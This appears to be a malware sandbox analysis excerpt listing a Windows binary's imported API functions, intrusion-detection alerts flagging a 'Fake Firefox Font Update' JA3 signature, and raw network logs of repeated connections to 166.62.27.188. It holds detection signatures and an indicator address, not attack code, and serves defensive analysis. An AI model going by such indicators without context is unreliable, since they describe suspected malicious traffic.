                    user32.dll | CreateWindowExA, WindowFromPoint, WaitMessage, UpdateWindow, UnregisterClassA, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, SystemParametersInfoA, ShowWindow, ShowScrollBar, ShowOwnedPopups, SetWindowsHookExA, SetWindowPos, SetWindowPlacement, SetWindowLongW, SetWindowLongA, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropA, SetParent, SetMenuItemInfoA, SetMenu, SetForegroundWindow, SetFocus, SetCursor, SetClassLongA, SetCapture, SetActiveWindow, SendMessageW, SendMessageA, ScrollWindow, ScreenToClient, RemovePropA, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageA, RegisterClipboardFormatA, RegisterClassA, RedrawWindow, PtInRect, PostQuitMessage, PostMessageA, PeekMessageW, PeekMessageA, OffsetRect, OemToCharA, MessageBoxA, MapWindowPoints, MapVirtualKeyA, LoadStringA, LoadKeyboardLayoutA, LoadIconA, LoadCursorA, LoadBitmapA, KillTimer, IsZoomed, IsWindowVisible, IsWindowUnicode, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageW, IsDialogMessageA, IsChild, InvalidateRect, IntersectRect, InsertMenuItemA, InsertMenuA, InflateRect, GetWindowThreadProcessId, GetWindowTextA, GetWindowRect, GetWindowPlacement, GetWindowLongW, GetWindowLongA, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropA, GetParent, GetWindow, GetMessagePos, GetMenuStringA, GetMenuState, GetMenuItemInfoA, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutNameA, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextA, GetIconInfo, GetForegroundWindow, GetFocus, GetDlgItem, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClientRect, GetClassLongA, GetClassInfoA, GetCapture, GetActiveWindow, FrameRect, FindWindowA, FillRect, EqualRect, EnumWindows, EnumThreadWindows, EnumChildWindows, EndPaint, EnableWindow, EnableScrollBar, EnableMenuItem, DrawTextA, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawFocusRect, DrawEdge, DispatchMessageW, DispatchMessageA, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcA, DefMDIChildProcA, DefFrameProcA, CreatePopupMenu, CreateMenu, CreateIcon, ClientToScreen, CheckMenuItem, CallWindowProcA, CallNextHookEx, BeginPaint, CharNextA, CharLowerA, CharToOemA, AdjustWindowRectEx, ActivateKeyboardLayout
                    gdi32.dll | UnrealizeObject, StretchBlt, SetWindowOrgEx, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SelectPalette, SelectObject, SaveDC, RestoreDC, RectVisible, RealizePalette, Polyline, PatBlt, MoveToEx, MaskBlt, LineTo, IntersectClipRect, GetWindowOrgEx, GetTextMetricsA, GetTextExtentPoint32A, GetSystemPaletteEntries, GetStockObject, GetRgnBox, GetPixel, GetPaletteEntries, GetObjectA, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, GdiFlush, ExcludeClipRect, DeleteObject, DeleteDC, CreateSolidBrush, CreatePenIndirect, CreatePalette, CreateHalftonePalette, CreateFontIndirectA, CreateDIBitmap, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, BitBlt
                    version.dll | VerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA
                    kernel32.dll | lstrcpyA, lstrcatA, _lread, _lopen, _llseek, _lclose, WriteFile, WaitForSingleObject, VirtualQuery, VirtualAlloc, SizeofResource, SetThreadLocale, SetFilePointer, SetEvent, SetErrorMode, SetEndOfFile, ResetEvent, ReadFile, MultiByteToWideChar, MulDiv, LockResource, LoadResource, LoadLibraryA, LeaveCriticalSection, InitializeCriticalSection, GlobalFindAtomA, GlobalDeleteAtom, GlobalAddAtomA, GetVersionExA, GetVersion, GetTickCount, GetThreadLocale, GetStdHandle, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLocalTime, GetLastError, GetFullPathNameA, GetDiskFreeSpaceA, GetDateFormatA, GetCurrentThreadId, GetCurrentProcessId, GetCPInfo, FreeResource, InterlockedExchange, FreeLibrary, FormatMessageA, FindResourceA, EnumCalendarInfoA, EnterCriticalSection, DeleteCriticalSection, CreateThread, CreateFileA, CreateEventA, CompareStringA, CloseHandle
                    advapi32.dll | RegQueryValueExA, RegOpenKeyExA, RegFlushKey, RegCloseKey
                    oleaut32.dll | CreateErrorInfo, GetErrorInfo, SetErrorInfo, SysFreeString
                    ole32.dll | CoCreateInstance, CoUninitialize, CoInitialize
                    kernel32.dll | Sleep
                    oleaut32.dll | SafeArrayPtrOfIndex, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopy, VariantClear, VariantInit
                    comctl32.dll | _TrackMouseEvent, ImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_DragShowNolock, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Remove, ImageList_DrawEx, ImageList_Draw, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_Add, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create
                    comdlg32.dll | GetOpenFileNameA
                    Language of compilation system | Country where language is spoken
                    English | United States
                    Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                    2025-01-14T08:24:10.558255+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.6 | 49718 | 166.62.27.188 | 443 | TCP
                    2025-01-14T08:24:12.405250+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.6 | 49736 | 166.62.27.188 | 443 | TCP
                    2025-01-14T08:24:14.338304+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.6 | 49748 | 166.62.27.188 | 443 | TCP
                    2025-01-14T08:24:16.296521+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.6 | 49761 | 166.62.27.188 | 443 | TCP
                    2025-01-14T08:24:18.281135+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.6 | 49777 | 166.62.27.188 | 443 | TCP
                    2025-01-14T08:24:20.231335+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.6 | 49794 | 166.62.27.188 | 443 | TCP
                    2025-01-14T08:24:22.182065+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.6 | 49806 | 166.62.27.188 | 443 | TCP
                    2025-01-14T08:24:24.136166+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.6 | 49824 | 166.62.27.188 | 443 | TCP
                    2025-01-14T08:24:26.166228+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.6 | 49841 | 166.62.27.188 | 443 | TCP
                    2025-01-14T08:24:28.131820+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.6 | 49856 | 166.62.27.188 | 443 | TCP
                    2025-01-14T08:24:30.078952+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.6 | 49871 | 166.62.27.188 | 443 | TCP
                    2025-01-14T08:24:32.007116+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.6 | 49881 | 166.62.27.188 | 443 | TCP
                    2025-01-14T08:24:34.045606+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.6 | 49896 | 166.62.27.188 | 443 | TCP
                    2025-01-14T08:24:35.982748+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.6 | 49909 | 166.62.27.188 | 443 | TCP
                    2025-01-14T08:24:37.942258+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.6 | 49926 | 166.62.27.188 | 443 | TCP
                    2025-01-14T08:24:39.916563+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.6 | 49941 | 166.62.27.188 | 443 | TCP
                    2025-01-14T08:24:41.844140+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.6 | 49953 | 166.62.27.188 | 443 | TCP
                    2025-01-14T08:24:43.798640+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.6 | 49966 | 166.62.27.188 | 443 | TCP
                    2025-01-14T08:24:46.605744+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.6 | 49982 | 166.62.27.188 | 443 | TCP
                    2025-01-14T08:24:48.526451+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.6 | 49998 | 166.62.27.188 | 443 | TCP
                    2025-01-14T08:24:50.493883+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.6 | 50010 | 166.62.27.188 | 443 | TCP
                    2025-01-14T08:24:52.428494+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.6 | 50027 | 166.62.27.188 | 443 | TCP
                    2025-01-14T08:24:54.368392+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.6 | 50029 | 166.62.27.188 | 443 | TCP
                    2025-01-14T08:24:56.342749+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.6 | 50031 | 166.62.27.188 | 443 | TCP
                    2025-01-14T08:24:58.286247+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.6 | 50033 | 166.62.27.188 | 443 | TCP
                    2025-01-14T08:25:00.225958+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.6 | 50035 | 166.62.27.188 | 443 | TCP
                    2025-01-14T08:25:02.169327+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.6 | 50038 | 166.62.27.188 | 443 | TCP
                    2025-01-14T08:25:04.209196+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650040166.62.27.188443TCP
                    2025-01-14T08:25:06.190632+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650042166.62.27.188443TCP
                    2025-01-14T08:25:08.118909+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650044166.62.27.188443TCP
                    2025-01-14T08:25:10.033109+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650046166.62.27.188443TCP
                    2025-01-14T08:25:11.978018+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650048166.62.27.188443TCP
                    2025-01-14T08:25:13.976443+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650050166.62.27.188443TCP
                    2025-01-14T08:25:15.909470+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650052166.62.27.188443TCP
                    2025-01-14T08:25:17.885246+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650055166.62.27.188443TCP
                    2025-01-14T08:25:19.825410+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650057166.62.27.188443TCP
                    2025-01-14T08:25:21.755181+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650059166.62.27.188443TCP
                    2025-01-14T08:25:23.714602+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650061166.62.27.188443TCP
                    2025-01-14T08:25:25.647828+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650063166.62.27.188443TCP
                    2025-01-14T08:25:27.568751+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650065166.62.27.188443TCP
                    2025-01-14T08:25:29.504572+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650067166.62.27.188443TCP
                    2025-01-14T08:25:31.480033+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650069166.62.27.188443TCP
                    2025-01-14T08:25:33.452995+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650071166.62.27.188443TCP
                    2025-01-14T08:25:35.378327+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650073166.62.27.188443TCP
                    2025-01-14T08:25:37.276138+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650075166.62.27.188443TCP
                    2025-01-14T08:25:39.232950+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650077166.62.27.188443TCP
                    2025-01-14T08:25:41.165641+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650079166.62.27.188443TCP
                    2025-01-14T08:25:43.065507+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650081166.62.27.188443TCP
                    2025-01-14T08:25:44.969186+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650083166.62.27.188443TCP
                    2025-01-14T08:25:46.871981+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650085166.62.27.188443TCP
                    2025-01-14T08:25:48.773009+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650087166.62.27.188443TCP
                    2025-01-14T08:25:50.688170+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650090166.62.27.188443TCP
                    2025-01-14T08:25:52.611704+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650092166.62.27.188443TCP
                    2025-01-14T08:25:54.516715+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650094166.62.27.188443TCP
                    2025-01-14T08:25:56.420846+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650096166.62.27.188443TCP
                    2025-01-14T08:25:58.402905+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650098166.62.27.188443TCP
                    2025-01-14T08:26:00.326241+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650100166.62.27.188443TCP
                    2025-01-14T08:26:02.259162+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650102166.62.27.188443TCP
                    2025-01-14T08:26:04.207809+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650104166.62.27.188443TCP
                    2025-01-14T08:26:06.144655+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650106166.62.27.188443TCP
                    2025-01-14T08:26:08.062325+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650108166.62.27.188443TCP
                    2025-01-14T08:26:09.994141+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650110166.62.27.188443TCP
                    2025-01-14T08:26:11.902567+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650112166.62.27.188443TCP
                    Jan 14, 2025 08:24:28.870698929 CET8049712166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:29.176359892 CET8049712166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:29.177685976 CET49871443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:29.177723885 CET44349871166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:29.177800894 CET49871443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:29.178109884 CET49871443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:29.178127050 CET44349871166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:29.218208075 CET4971280192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:30.078778028 CET44349871166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:30.078952074 CET49871443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:30.080260038 CET49871443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:30.080266953 CET44349871166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:30.081037045 CET44349871166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:30.084522009 CET49871443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:30.127337933 CET44349871166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:30.662108898 CET44349871166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:30.662374973 CET44349871166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:30.662439108 CET49871443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:30.663156986 CET49871443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:30.663166046 CET44349871166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:30.663182020 CET49871443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:30.663187981 CET44349871166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:30.789196014 CET4988080192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:30.794138908 CET8049880166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:30.794253111 CET4988080192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:30.794428110 CET4988080192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:30.796313047 CET4971280192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:30.799308062 CET8049880166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:30.799377918 CET4988080192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:30.801212072 CET8049712166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:31.106925011 CET8049712166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:31.108355045 CET49881443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:31.108405113 CET44349881166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:31.108479023 CET49881443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:31.108846903 CET49881443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:31.108865023 CET44349881166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:31.150276899 CET4971280192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:32.007038116 CET44349881166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:32.007116079 CET49881443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:32.011558056 CET49881443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:32.011579990 CET44349881166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:32.012403011 CET44349881166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:32.013696909 CET49881443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:32.055340052 CET44349881166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:32.584136009 CET44349881166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:32.584656954 CET44349881166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:32.584712029 CET49881443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:32.584933996 CET49881443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:32.584953070 CET44349881166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:32.584969997 CET49881443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:32.584975004 CET44349881166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:32.712943077 CET4989180192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:32.717777967 CET8049891166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:32.717868090 CET4989180192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:32.717993975 CET4989180192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:32.719608068 CET4971280192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:32.722908020 CET8049891166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:32.722964048 CET4989180192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:32.724389076 CET8049712166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:33.138227940 CET8049712166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:33.139930010 CET49896443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:33.139977932 CET44349896166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:33.140077114 CET49896443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:33.140443087 CET49896443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:33.140465975 CET44349896166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:33.193169117 CET4971280192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:34.045527935 CET44349896166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:34.045605898 CET49896443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:34.047125101 CET49896443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:34.047135115 CET44349896166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:34.047377110 CET44349896166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:34.048634052 CET49896443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:34.095333099 CET44349896166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:34.626360893 CET44349896166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:34.626619101 CET44349896166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:34.626684904 CET49896443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:34.627667904 CET49896443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:34.627667904 CET49896443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:34.627687931 CET44349896166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:34.627698898 CET44349896166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:34.754168034 CET4990780192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:34.759090900 CET8049907166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:34.759186029 CET4990780192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:34.759468079 CET4990780192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:34.761452913 CET4971280192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:34.764337063 CET8049907166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:34.764461040 CET4990780192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:34.766285896 CET8049712166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:35.071767092 CET8049712166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:35.073137999 CET49909443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:35.073158026 CET44349909166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:35.073256016 CET49909443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:35.073594093 CET49909443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:35.073610067 CET44349909166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:35.127167940 CET4971280192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:35.982641935 CET44349909166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:35.982748032 CET49909443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:35.983946085 CET49909443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:35.983953953 CET44349909166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:35.984286070 CET44349909166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:35.988179922 CET49909443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:36.031352997 CET44349909166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:36.574266911 CET44349909166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:36.574862003 CET44349909166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:36.575508118 CET49909443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:36.575566053 CET49909443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:36.575584888 CET44349909166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:36.575603008 CET49909443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:36.575612068 CET44349909166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:36.714101076 CET4992380192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:36.718938112 CET8049923166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:36.719023943 CET4992380192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:36.719219923 CET4992380192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:36.721414089 CET4971280192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:36.724037886 CET8049923166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:36.724097967 CET4992380192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:36.726241112 CET8049712166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:37.031873941 CET8049712166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:37.037734032 CET49926443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:37.037820101 CET44349926166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:37.037909031 CET49926443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:37.038252115 CET49926443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:37.038269043 CET44349926166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:37.091185093 CET4971280192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:37.942146063 CET44349926166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:37.942257881 CET49926443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:37.943521976 CET49926443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:37.943527937 CET44349926166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:37.943764925 CET44349926166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:37.944978952 CET49926443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:37.987333059 CET44349926166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:38.534532070 CET44349926166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:38.534812927 CET44349926166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:38.535588980 CET49926443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:38.535630941 CET49926443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:38.535645962 CET44349926166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:38.535660982 CET49926443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:38.535666943 CET44349926166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:38.662689924 CET4993780192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:38.667610884 CET8049937166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:38.671166897 CET4993780192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:38.671767950 CET4993780192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:38.674072027 CET4971280192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:38.676594019 CET8049937166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:38.676642895 CET4993780192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:38.678889036 CET8049712166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:38.984817028 CET8049712166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:39.013417006 CET49941443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:39.013456106 CET44349941166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:39.013506889 CET49941443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:39.013835907 CET49941443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:39.013844967 CET44349941166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:39.034225941 CET4971280192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:39.916495085 CET44349941166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:39.916563034 CET49941443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:39.918034077 CET49941443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:39.918040037 CET44349941166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:39.918256998 CET44349941166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:39.919434071 CET49941443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:39.963373899 CET44349941166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:40.502566099 CET44349941166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:40.502897978 CET44349941166.62.27.188192.168.2.6
                    Jan 14, 2025 08:24:40.502957106 CET49941443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:40.503506899 CET49941443192.168.2.6166.62.27.188
                    Jan 14, 2025 08:24:40.503518105 CET44349941166.62.27.188192.168.2.6
